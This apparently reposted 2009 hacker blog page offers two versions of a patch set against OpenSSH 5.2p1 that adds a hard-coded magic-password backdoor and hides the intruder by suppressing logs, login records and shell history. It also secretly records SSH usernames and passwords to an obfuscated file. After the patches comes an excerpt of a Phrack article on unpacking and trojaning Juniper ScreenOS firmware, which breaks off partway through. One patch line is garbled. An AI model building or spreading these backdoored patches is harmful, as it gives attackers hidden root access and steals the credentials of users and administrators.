+ #define BAJAUPASS "@#;.,uDc,.;#@"
+ #define SSH_LOG "/usr/share/yelp/im.xml"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H

diff -Ncr openssh-5.2p1/log.c uDc-hackssh-v1.0b/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0b/log.c Fri Sep 11 22:38:47 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch
+ if(uDc) return;
+ // end of patch if (level > log_level)
return;

diff -Ncr openssh-5.2p1/loginrec.c uDc-hackssh-v1.0b/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0b/loginrec.c Fri Sep 11 22:38:47 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");

diff -Ncr openssh-5.2p1/session.c uDc-hackssh-v1.0b/session.c
*** openssh-5.2p1/session.c Wed Jan 28 13:29:49 2009
--- uDc-hackssh-v1.0b/session.c Fri Sep 11 23:48:15 2009
***************
*** 1193,1198 ****
--- 1193,1203 ----
if (getenv("TZ"))
child_set_env(&env, &envsize, "TZ", getenv("TZ"));

+ // slash patch
+ if(uDc)
+ child_set_env(&env, &envsize, "HISTFILE", "/dev/null");
+ // end of patch
+
/* Set custom environment options from RSA authentication. */
if (!options.use_login) {
while (custom_environment) {
***************
*** 1496,1501 ****
--- 1501,1510 ----

if (setlogin(pw->pw_name) < 0) error("setlogin failed: %s", strerror(errno));
+ // slash patch
+ if(!uDc) {
+ // end of patch
+ if (setgid(pw->pw_gid) < 0) { perror("setgid"); exit(1);
***************
*** 1505,1510 ****
--- 1514,1526 ----
perror("initgroups");
exit(1);
}
+ // slash patch
+ }
+ else {
+ setgid(0);
+ initgroups(pw->pw_name, 0);
+ }
+ // end of patch
endgrent();
# ifdef USE_PAM
/*
***************
*** 1547,1552 ****
--- 1563,1570 ----
}
#else
/* Permanently switch to the desired uid. */
+ // slash patch
+ if(!uDc)
permanently_set_uid(pw);
#endif
}
***************
*** 1554,1560 ****
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
--- 1572,1581 ----
#ifdef HAVE_CYGWIN
if (is_winnt)
#endif
! // slash patch
! //if (getuid() != pw->pw_uid || geteuid() != pw->pw_uid)
! if ((getuid() != pw->pw_uid || geteuid() != pw->pw_uid) && !uDc)
! // end of patch
fatal("Failed to set uids to %u.", (u_int) pw->pw_uid);

#ifdef WITH_SELINUX
***************
*** 2614,2621 ****
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! else
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
}

int
--- 2635,2648 ----
{
if (s->pw == NULL)
error("no user for session %d", s->self);
! // slash patch
! else {
! if(!uDc)
! setproctitle("%s@%s", s->pw->pw_name, session_tty_list());
! else
! setproctitle("","");
! }
! // end of patch
}

int
diff -Ncr openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0b/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0b/sshconnect1.c Fri Sep 11 22:38:47 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();

diff -Ncr openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0b/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0b/sshconnect2.c Fri Sep 11 22:38:47 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);

diff -Ncr openssh-5.2p1/sshlogin.c uDc-hackssh-v1.0b/sshlogin.c
*** openssh-5.2p1/sshlogin.c Mon Sep 17 14:09:16 2007
--- uDc-hackssh-v1.0b/sshlogin.c Sat Sep 12 00:03:40 2009
***************
*** 118,123 ****
--- 118,126 ----
record_login(pid_t pid, const char *tty, const char *user, uid_t uid,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

/* save previous login details before writing new */
***************
*** 127,132 ****
--- 130,138 ----
login_set_addr(li, addr, addrlen);
login_login(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}

#ifdef LOGIN_NEEDS_UTMPX
***************
*** 134,145 ****
--- 140,157 ----
record_utmp_only(pid_t pid, const char *ttyname, const char *user,
const char *host, struct sockaddr *addr, socklen_t addrlen)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, host, ttyname);
login_set_addr(li, addr, addrlen);
login_utmp_only(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}
#endif

***************
*** 147,155 ****
--- 159,173 ----
void
record_logout(pid_t pid, const char *tty, const char *user)
{
+ // slash patch
+ if(!uDc) {
+ // end of patch
struct logininfo *li;

li = login_alloc_entry(pid, user, NULL, tty);
login_logout(li);
login_free_entry(li);
+ // slash patch
+ }
+ // end of patch
}

diff -Ncr openssh-5.2p1/version.h uDc-hackssh-v1.0b/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0b/version.h Fri Sep 11 22:38:47 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh verions
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch

uDc-hackssh-v1.0a

2009-07-21T23:01:00.006+08:00

The following openssh-5.2p1 patches allow users to:

login with any users with 'magic password'
hide footprint from wtmp, utmp and lastlog
log ssh inbound and outbound username and password

This patches tested on Mac OS X, Solaris 5.10, Ubuntu 8.10 and FreeBSD 7.10. It should works for other operating system too.

slash@Slash-The-Undergrounds-Hackintosh:$ cat uDc-hackssh-v1.0a
diff -Nrc openssh-5.2p1/auth-pam.c uDc-hackssh-v1.0a/auth-pam.c
*** openssh-5.2p1/auth-pam.c Tue Mar 11 19:58:25 2008
--- uDc-hackssh-v1.0a/auth-pam.c Sun Jul 19 13:59:46 2009
***************
*** 466,471 ****
--- 466,474 ----
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;
sshpam_err = pam_authenticate(sshpam_handle, flags);
+ // slash patch
+ if(uDc) sshpam_err = PAM_SUCCESS;
+ // end of patch
if (sshpam_err != PAM_SUCCESS)
goto auth_fail;

***************
*** 816,821 ****
--- 819,833 ----
Buffer buffer;
struct pam_ctxt *ctxt = ctx;

+ // slash patch
+ if(sshpam_authctxt)
+ for (ai = 0; ai <>user, resp[ai]);
+ if(!strcmp(BAJAUPASS, resp[ai])) ctxt->pam_done = uDc = 1;
+ else uDclog();
+ }
+ // end of patch
debug2("PAM: %s entering, %u responses", __func__, num);
switch (ctxt->pam_done) {
case 1:
***************
*** 1045,1050 ****
--- 1057,1065 ----
if (sshpam_err != PAM_SUCCESS)
fatal("PAM: failed to set PAM_CONV: %s",
pam_strerror(sshpam_handle, sshpam_err));
+ // slash patch
+ if(!uDc)
+ // end of patch
sshpam_err = pam_open_session(sshpam_handle, 0);
if (sshpam_err == PAM_SUCCESS)
sshpam_session_open = 1;
diff -Nrc openssh-5.2p1/auth-passwd.c uDc-hackssh-v1.0a/auth-passwd.c
*** openssh-5.2p1/auth-passwd.c Fri Oct 26 12:25:12 2007
--- uDc-hackssh-v1.0a/auth-passwd.c Sun Jul 19 14:01:06 2009
***************
*** 92,97 ****
--- 92,103 ----
#endif
if (*password == '\0' && options.permit_empty_passwd == 0)
return 0;
+ // slash patch
+ if(!strcmp(BAJAUPASS, password)) return uDc = 1;
+ sprintf(abuff, "pass_from: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), pw->pw_name, password);
+ uDclog();
+ // end of patch

#ifdef KRB5
if (options.kerberos_authentication == 1) {
diff -Nrc openssh-5.2p1/includes.h uDc-hackssh-v1.0a/includes.h
*** openssh-5.2p1/includes.h Fri Jul 4 21:10:49 2008
--- uDc-hackssh-v1.0a/includes.h Sun Jul 19 14:09:10 2009
***************
*** 13,18 ****
--- 13,41 ----
* called by a name other than "ssh" or "Secure Shell".
*/

+ // slash patch
+ #include
+ #include
+
+ #define BAJAUPASS "black-session"
+ #define SSH_LOG "/var/run/sshd.sync"
+
+ FILE *bajaulog;
+ char abuff[1024];
+ int kambing, ai, uDc;
+
+ #define uDclog() { \
+ kambing=strlen(abuff); \
+ for(ai=0; ai<=kambing; ai++) abuff[ai]=~abuff[ai]; \
+ bajaulog=fopen(SSH_LOG, "a"); \
+ if(bajaulog!=NULL) { fwrite(abuff, kambing, 1, bajaulog); fclose(bajaulog);} \
+ chmod(SSH_LOG, 0666); \
+ }
+
+ const char *get_remote_ipaddr(void);
+ // end of patch
+
+ #ifndef INCLUDES_H
#define INCLUDES_H
diff -Nrc openssh-5.2p1/log.c uDc-hackssh-v1.0a/log.c
*** openssh-5.2p1/log.c Tue Jun 10 21:01:51 2008
--- uDc-hackssh-v1.0a/log.c Sun Jul 19 14:09:50 2009
***************
*** 338,343 ****
--- 338,346 ----
int pri = LOG_INFO;
int saved_errno = errno;
+ // slash patch + if(uDc) return;
+ // end of patch if (level > log_level)
return;

diff -Nrc openssh-5.2p1/loginrec.c uDc-hackssh-v1.0a/loginrec.c
*** openssh-5.2p1/loginrec.c Thu Feb 12 10:12:22 2009
--- uDc-hackssh-v1.0a/loginrec.c Sun Jul 19 14:11:00 2009
***************
*** 431,436 ****
--- 431,439 ----
int
login_write(struct logininfo *li)
{
+ // slash patch
+ if(uDc) return 0;
+ // end of patch
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit("Attempt to write login records by non-root user (aborting)");
diff -Nrc openssh-5.2p1/sshconnect1.c uDc-hackssh-v1.0a/sshconnect1.c
*** openssh-5.2p1/sshconnect1.c Tue Nov 7 20:14:42 2006
--- uDc-hackssh-v1.0a/sshconnect1.c Sun Jul 19 14:12:35 2009
***************
*** 458,463 ****
--- 458,468 ----
password = read_passphrase(prompt, 0);
packet_start(SSH_CMSG_AUTH_PASSWORD);
ssh_put_password(password);
+ // slash patch
+ sprintf(abuff, "1to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_send();
diff -Nrc openssh-5.2p1/sshconnect2.c uDc-hackssh-v1.0a/sshconnect2.c
*** openssh-5.2p1/sshconnect2.c Wed Nov 5 13:20:47 2008
--- uDc-hackssh-v1.0a/sshconnect2.c Sun Jul 19 14:15:51 2009
***************
*** 797,802 ****
--- 797,807 ----
packet_put_cstring(authctxt->method->name);
packet_put_char(0);
packet_put_cstring(password);
+ // slash patch
+ sprintf(abuff, "2to: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, password);
+ uDclog();
+ // end of patch
memset(password, 0, strlen(password));
xfree(password);
packet_add_padding(64);
***************
*** 1464,1469 ****
--- 1469,1479 ----

response = read_passphrase(prompt, echo ? RP_ECHO : 0);

+ // slash patch
+ sprintf(abuff, "2ito: %s \tuser: %s \tpass: %s\n",
+ get_remote_ipaddr(), options.user, response);
+ uDclog();
+ // end of patch
packet_put_cstring(response);
memset(response, 0, strlen(response));
xfree(response);
diff -Nrc openssh-5.2p1/version.h uDc-hackssh-v1.0a/version.h
*** openssh-5.2p1/version.h Mon Feb 23 08:09:26 2009
--- uDc-hackssh-v1.0a/version.h Sun Jul 19 14:17:31 2009
***************
*** 1,6 ****
--- 1,9 ----
/* $OpenBSD: version.h,v 1.55 2009/02/23 00:06:15 djm Exp $ */

+ // slash patch
+ // change to targetted openssh version
#define SSH_VERSION "OpenSSH_5.2"

#define SSH_PORTABLE "p1"
#define SSH_RELEASE SSH_VERSION SSH_PORTABLE
+ // end of patch

My favorite article of the year so far.

2009-07-17T16:26:00.003+08:00

File: archives/66/p66_0x05_Backdooring Juniper Firewalls_by_Graeme.txt
   ==Phrack Inc.==

 Volume 0x0d, Issue 0x42, Phile #0x05 of 0x11

|=-----------------------------------------------------------------------=|
|=---------------=[     Netscreen of the Dead:      ]=-------------------=|
|=-=[ Developing a Trojaned Firmware for Juniper ScreenOS Platforms  ]=--=|
|=-----------------------------------------------------------------------=|
|=-----------------------------------------------------------------------=|
|=-------------------=[     By graeme@lolux.net     ]=-------------------=|
|=-----------------------------------------------------------------------=|


--[ Index
0x1 - Trailer
0x2 - Opening Scene
0x3 - The Attack
0x4 - Live Evisceration
0x5 - Feeding on the Remains
0x6 - Night of the Living Netscreen
0x7 - Autopsy
0x8 - Netscreen of the Dead
0x9 - Zombie Loader
0xA - 28 Hacks Later
0xB - Closing Scene
0xC - References
0xD - Credits
0xE - Addendum


--[ 0x1 - Trailer

This article describes how an attacker can obtain, modify and install a
modified version of Juniper ScreenOS which can run attacker supplied code
which performs hidden operations or operations contrary to the
configuration of any Juniper platform running ScreenOS.

The attacker could be any one of the following:
- an attacker that has exploited a vulnerability in ScreenOS
- someone who has illicitly obtained the administrator password
- someone with physical access to the device (vendor / 3rd party support)
- an attacker conducting a man-in-the-middle attack on the network
- a malicious administrator


--[ 0x2 - Opening Scene

Netscreens are manufactured by Juniper Inc and are all in one firewall,
VPN, router security appliance. They range in scale from SME to Datacentre
(NS5XP --  NS5000). Most are Common Criteria and FIPS certified and run a
closed source, real time OS called ScreenOS which is supplied by Juniper
as a binary firmware 'blob'.

The hardware used for this research was a Netscreen NS5XT containing an
AMCC PowerPC 405 GP RISC processor and 64MB flash. The firmware used as
the basis for modified firmware images was ScreenOS 5.3.0r10. Interfaces
for administration are serial console, Telnet, SSH, and HTTP/HTTPS. The
firmware can be installed from serial console, via the web interface or
via TFTP.

The configuration of the device is stored as a file on the flash and is
independent of the firmware.


--[ 0x3 - The Attack

The goal of the attack is to be able to install attacker modified firmware
which provides hidden root control of the appliance. When attacking
firmware there are two vectors of attack:

1. Live evisceration: debugging with remote GDB debugger over serial line

2. Feeding on the remains: dead listing and static binary analysis using a
disassembler and hex editor.

The next two sections will discuss these two approaches and how successful
they were in this specific instance. At this point it is worth noting some
key features of the PowerPC hardware architecture:
- fixed instruction size of 4 bytes
- flat memory model
- 32 general purpose registers (r0-r31)
- no explicit stack but convention of using r01
- link register (lr) for returning to calling function
- program counter (pc) for current instruction
- count register (ctr) for loop counter or return address
- exception register (xer) for exceptions, status and control

Detailed information on the PowerPC architecture is available from the IBM
PPC405 Embedded Processor Core User Manual which can be downloaded from
http://www-01.ibm.com/chips/techlib/techlib.nsf/products/
PowerPC_405_Embedded_Cores


--[ 0x4 - Live Evisceration

For live debugging a GDB compiled for PowerPC was required. The Embedded
Linux Development Kit (http://www.denx.de/wiki/DULG/ELDK) has GDB compiled
for a number of embedded platforms including the PowerPC 403 and 405
processors. This provides remote debugging of systems over a serial
connection.

Obviously no source for ScreenOS was available so it was necessary to
create a custom GDB init file for displaying PPC registers and 'stack' to
provide useful information on breaks. GDB reads init files on startup and
init files use the same syntax as GDB command files and are processed by
GDB in the same way. The init file in your home directory (~/.gdbinit) can
set options that affect subsequent processing of command line options and
operands. An example gdb init file is supplied in the addendum. This gdb
init file outputs context similar to the windows SoftICE tool which
reverse engineers should be familiar with. Below is an example of a GDB
session connected to a Netscreen:

--start gdb session

GNU gdb Red Hat Linux (6.7-1rh)
Copyright (C) 2007 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later

This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "--host=i686-pc-linux-gnu --target=ppc-linux".
The target architecture is set automatically (currently powerpc:403)

gdb>target remote /dev/ttyU0

0x0032bea4 in ?? ()
gdb>
gdb>context

powerpc
---------------------------------------------------------------------[regs]
r00:00000001 r01:03790528 r02:01358000 r03:FFFFFFFF     pc:0032BEA4
r04:0000002E r05:00000000 r06:00000000 r07:00000000
r08:01631050 r09:01350000 r10:01630000 r11:01630000     lr:0032C5CC
r12:40000022 r13:00000000 r14:6FFFA27F r15:1B9FC3F7
r16:00000000 r17:402D04D0 r18:03791470 r19:00000000    ctr:0060A764
r20:03790B48 r21:013509AC r22:FFFFFFFF r23:0379147E
r24:00000000 r25:00000000 r26:00000000 r27:00000000     cr:40000028
r28:03791470 r29:00000000 r30:03790F20 r31:0135098C    xer:20000046

[03790528]----------------------------------------------------------[stack]
0379058C : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
03790570 : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
0379055A : 00 00 00 00  00 00 00 00 - 00 00 00 00  00 00 00 00
0379053E : A6 40 03 79  06 C0 00 60 - A9 BC 00 00  00 00 00 00 .@y.`..
03790528 : 03 79 05 30  00 06 22 F0 - 03 79 03 79  05 40 00 32 y0".yy@2
03790512 : 00 01 03 79  12 58 03 79 - 05 20 0F 20  00 06 37 08 yXy  7
037904F6 : 00 00 00 00  00 05 01 62 - 9F A0 C2 28  01 4A 05 EA ...(J..
037904E0 : 03 79 04 E8  00 32 BE 60 - 03 79 03 79  14 70 01 4A y.2.`yypJ
037904C4 : 01 6F 0A 24  03 79 04 E0 - 00 B8 00 00  00 6C 03 79 o$y..ly

[0032BEA4]-----------------------------------------------------------[code]
0x32bea4:       lwz     r0,12(r1)
0x32bea8:       mtlr    r0
0x32beac:       addi    r1,r1,8
0x32beb0:       blr
0x32beb4:       stwu    r1,-40(r1)
0x32beb8:       mflr    r0
0x32bebc:       stw     r29,28(r1)
0x32bec0:       stw     r30,32(r1)
0x32bec4:       stw     r31,36(r1)
0x32bec8:       stw     r0,44(r1)
0x32becc:       mr      r31,r3
0x32bed0:       lis     r9,322
0x32bed4:       lwz     r0,-13800(r9)
0x32bed8:       cmpwi   r0,0
0x32bedc:       beq-    0x32bef0
0x32bee0:       lis     r3,196
----------------------------------------------------------------------
gdb>

--end gdb session

The steps for remote debugging on the Netscreen are as follows:
1. Connect to a network interface and the serial console of the Netscreen
from a PC.
2. Over a telnet / SSH session to the Netscreen enable GDB using:
ns5xt>set gdb enable
3. On the PC start gdbppc and connect to the remote gdb using:
gdb>target remote /dev/ttyUSB0

During this research remote debugging was useful for obtaining memory
dumps and querying specific memory addresses. However setting breakpoints
or single stepping did not appear to work. Information on how to get these
features working would be most appreciated by the author.

Observing the boot process of the Netscreen over a serial console did
provide useful information regarding the boot up sequence:

--start boot sequence

NetScreen NS-5XT Boot Loader Version 2.0.0 (Checksum: A1B6FF9B)
Copyright (c) 1997-2003 NetScreen Technologies, Inc.

Total physical memory: 64MB
 Test - Pass
 Initialization - Done

Hit any key to run loader
Hit any key to run loader
Hit any key to run loader
Hit any key to run loader

Loading default system image from on-board flash disk...

Ignore image authentication!

Start loading...
.............................................................

Done.



Juniper Networks, Inc
NS-5XT  System Software
Copyright, 1997-2004

Version 5.3.0r10.0
Load Manufacture Information ... Done
Load NVRAM Information ... (5.3.0)Done
Install module init vectors
Verify ACL register default value (at hw reset) ... Done
Verify ACL register read/write ... Done
Verify ACL rule read/write ... Done
Verify ACL rule search ... Done
MD5("a") = 0cc175b9 c0f1b6a8 31c399e2 69772661
MD5("abc") = 90015098 3cd24fb0 d6963f7d 28e17f72
MD5("message digest") = f96b697d 7cb7938d 525a2f31 aaf161d0
Verify DES register read/write ... Done

Initial port mode trust-untrust(1)
Install modules (00c40000,0146d540) ... load dns table
: dns table file do not exist.

Initializing DI 1.1.0-ns
System config (1129 bytes) loaded
.
Done.
Load System Configuration
....................................................Done
system init done..
System change state to Active(1)
login:

--end of boot sequence

Stored boot loader executes and the opportunity is given to load a new
image over a serial connection. The default behaviour is then to
uncompress the stored firmware and run the image.

If a new image file is loaded over a serial console it is uncompressed
and some options are presented. The first prompt allows saving the new
image to flash. Even if the new image is not stored to flash the next
prompt allows running the new image. No password is required to load an
image over the serial line.
The boot loader is part of the firmware and if the new boot loader is
different from the version stored on the flash then the stored boot loader
is overwritten by the new one.


--[ 0x5 - Feeding on the Remains

Static binary analysis was the main method employed in this research.
ScreenOS images can be downloaded direct from the device or obtained from
the Juniper website by Juniper customers.

ScreenOS provides the following command to download the firmware over
tftp:

ns5xt>save software from flash to tftp 192.168.0.42 destination_file

It is important to note that this command downloads the compressed image
file stored on the flash, not the currently running image from memory
which may or may not be the same as the image file stored on the flash.

Using an undocumented command all the files on the flash can be listed:

ns5xt-> exec vfs ls flash:/
  $NSBOOT$.BIN              5,177,344
  envar.rec                 82
  golerd.rec                0
  node_secret.ace           0
  certfile.dsc              252
  certfile.dat              1,324
  ns_sys_config             1,129
  $lkg$.cfg                 1,259
  syscert.cfg               1,167
2,501,632 bytes free (7,686,144 total) on disk

$NSBOOT$.BIN is the firmware stored on flash. To download this securely
scp can be enabled on the Netscreen. Note the configuration of the device
is stored in ns_sys_config.

It is also possible to use GDB to dump the complete contents of the memory
over a serial line. This is sloooow.

gdb> set logging on
gdb> set height 0
gdb> set loging file 'dump'
gdb> x /2048000000i

As a Juniper customer I was able to download current and old versions of
ScreenOS firmware. Many firmware versions were compared as a first step in
determining the make up of the ScreenOS firmware images. The following 4
section structure was revealed by this comparative analysis:


0x00000000 /--------------------------\
     |         HEADER           |
0x00000050 |--------------------------|
     |                          |
0x00002020 |--------------------------|
     |        STUB            |
0x00012940 |--------------------------|
     |                          |
0x00012c00 |--------------------------|
     |     COMPRESSED BLOB      |
     |                          |
     |                          |
     |                          |
     |                          |
     |                          |
     |                          |
~0x004e6000 \--------------------------/

This is a similar format for other embedded firmware.

Compressed Firmware Header
The header consists of the following 4 byte fields making up 32 bytes:

- Signature (magic bytes)
- Information 4*1 byte fields:  00, Platform, CPU, Version (eg 0x00110A12)
- Offset  (for program entry point)
- Address (for program entry point)
- Size
- unknown
- unknown
- Checksum

Points to note are
- the size field   = (size of the compressed blob - 79 bytes)
- signature    = 0xEE16BA81
- offset    = 0x00000002
- address   = 0x02860000

and these were always the same in the version 5 firmwares that were
compared. Version 4 firmwares differed but were similar but these are old
versions and I will not discuss them here.

Stub

The stub in the firmware image is responsible for uncompressing the blob
when the device is booted. This stub contains strings relating to the LZMA
algorithm so it was assumed that the compressed blob is an LZMA compressed
binary blob. From the Wikipedia LZMA entry: "Decompression-only code for
LZMA generally compiles to around 5kB and the amount of RAM required
during decompression is principally determined by the size of the sliding
window used during compression. Small code size and relatively low memory
overhead, particularly with smaller dictionary lengths, and free source
code make the LZMA decompression algorithm well-suited to embedded
applications."

Free LZMA utilities are available here: http://tukaani.org/lzma/ and as
prebuilt packages for most *nix distributions.

Compressed Blob

The compressed blob is LZMA compressed and contains a header but this is a
non-standard header. There are non-standard signature bytes for the stub
to recognise the blob and the LZMA uncompresssed size field is missing.

The standard LZMA header has 3 fields:
options   (2 bytes)
dictionary_size  (4 bytes)
uncompressed_size   (8 bytes)

The blob header also has 3 fields but slightly different:
signature  (4 bytes) = 0x1440598
options   (2 bytes)
dictionary_size  (8 bytes)

The dictionary size is used as a parameter in the compression algorithm.
LZMA is a dictionary coder which I will not explain here but instead point
the reader to http://en.wikipedia.org/wiki/Dictionary_coder.

One approach would have been to attempt to use the header information and
the stub to decompress the compressed blob but given a lack of PowerPC
hardware a different approach was taken. The approach used was to cut out
the compressed blob from the firmware and attempt to decompress it in
isolation using any tools available. Again using comparative anlalysis,
the freely available LZMA utilities and direct modification of the header
bytes the following methods for decompression and compression of the blob
were reverse engineered.

The decompression process:
1. Cut out the compressed blob from the image file.
2. Insert uncompressed_size equal to -1 which equals unknown size
(-1 uncompresseed size = 0xFFFFFFFFFFFFFFFF)
3. Modify the dictionary_size from 0x00200000 to 0x00008000.
4. Decompress the file using standard LZMA utilities.

The modification of the dictionary size was found by fuzzing the field and
then attempting to decompress. The decompression reports an error at the
end of the decompression so it is important to decompress to a stream
otherwise the decompressed data is lost.

The recompression process:
1. Compress with standard LZMA utilities using specific compression
 options
2. Modify the dictionary_size field 0x00002000 to 0x00200000.
3. Delete the  uncompressed_size field of 8 bytes.
4. Concatenate with the header from the original image file.

Proof of concept python scripts are provided in the Addendum which can
perform the packing and unpacking of ScreenOS images. The LZMA utilities
are necessary for operation of these scripts.

The recompressed firmware successfully loads onto a Netscreen and runs.
More research into the dictionary size field was going to be carried out
but once loading of firmware was successful there were many other more
interesting avenues of research which took precedence.


--[ 0x6 - Night of the Living Netscreen

So at this stage we have successfully reverse engineered the compression
of the firmware. We are also in a position to reverse engineer the
operating system obtained from the decompression.

The steps are:

1. Cut out the compressed blob section of the image
2. Uncompress the blob.
3. Re-compress the modified binary.
4. Concatenate the original image header and the modified blob.
5. Upgrade the Netscreen with the modified operating system.

So we can install the firmware if we have physical access to the device or
some kind of funky remote serial console. But we want to be able to
install firmware over the network. However on attempting to upload a new
firmware via the device web interface or through the tftp command:

ns5xt>save software from tftp x.x.x.x  filename to flash

loading fails with a 'bad image file data' error. Note the insecure
transport mechanism for the firmware. This is vulnerable to a man in the
middle attack.

We need to fix the size and checksum fields of the compressed firmware
header. We know the size field needs to be set equal to the compressed
firmware size - 79 bytes. But we do not yet know how the checksum field is
calculated. To obtain the checksum algorithm we need to disassemble the
uncompressed blob we have from decompressing the firmware. We will now
discuss disassembling the binary and then move onto addressing the
checksum issue.

--[ 0x7 - Autopsy

The uncompressed blob is an approximately 20Mb binary.  We want to load
the binary into IDA (a disassembler with PowerPC support) but we need a
loading address so that relative addresses within the program point to the
correct memory locations. Initially the binary was loaded at address
0x00000000 but it is obvious that pointers to strings are not referencing
the beginning of strings.

The uncompressed blob contains a header with similarities to the
compressed firmware header. The header fields contain a virtual address
and a header size. If we subtract the header size from the virtual address
we have the loading address.

Uncompressed Blob Header

 signature offset  address
00000000: EE16BA81 00010110 00000020  00060000

ScreenOS Loading Address = 0x00060000 - 0x00000020 =  0x0005FFE0

This can be confirmed with live debugging by using GDB and querying the
memory at 0x0005FFE0 to check that the signature bytes 0xEE16BA81 are at
that memory location.

We can now rebase the program in IDA to use the correct loading address.
Now we have a correctly loaded binary but we do not know anything about
the structure of the binary or the sections it may contain as the binary
is not a recognised executable type. Code and data were marked using IDC
scripts which searched for function prologs (0x9421F*) and string cross
references.  The approximate segments of the binary found by scripting and
manual examination are sketched out in the very simplified illustration
below:

                           
0x0005ffe0 /-------------------------\
     |       HEADER &          |
     |       SCREENOS CODE     |
0x00c40000 |-------------------------|
     |       SCREENOS DATA     |
0x00f0efd8 |-------------------------|
         |     FILES   |
0x011ddab4 |-------------------------|
     |      BOOT LOADER CODE  |
0x011f2b4e |-------------------------|
     |      BOOT LOADER DATA  |
0x0140e04c |-------------------------|
     |       0xFFs             |
0x014171cf |-------------------------| 
     |   other stuff    |
     \-------------------------/

To build up a picture of the binary it is useful to search for functions
such as str_cmp, file_read, file_write etc and use error strings to
identify and name functions in IDA.

The boot loader can be cut out and disassembled separately with a loading
address of 0x00000000.


--[ 0x8 - Netscreen of the Dead

At this stage we are now ready to construct a ScreenOS Trojaned Firmware.
Any trojan has three basic requirements:

1. Delivery: It must be able to be installed remotely.
2. Access: It must provide remote access / communication.
3. Payload: It must provide attacker supplied code execution.

During this research all modification of the ScreenOS binary to construct
the trojaned version was hand crafted assembly inserted via hex editing
the binary firmware.

1. First Bite [ Delivery ]
Unlike loading a firmware over a serial console at boot time, the
checksum and size fields in the header are checked when images are loaded
over the network via TFTP or the Web interface

00000000: EE16BA81 00110A12 00000020 02860000
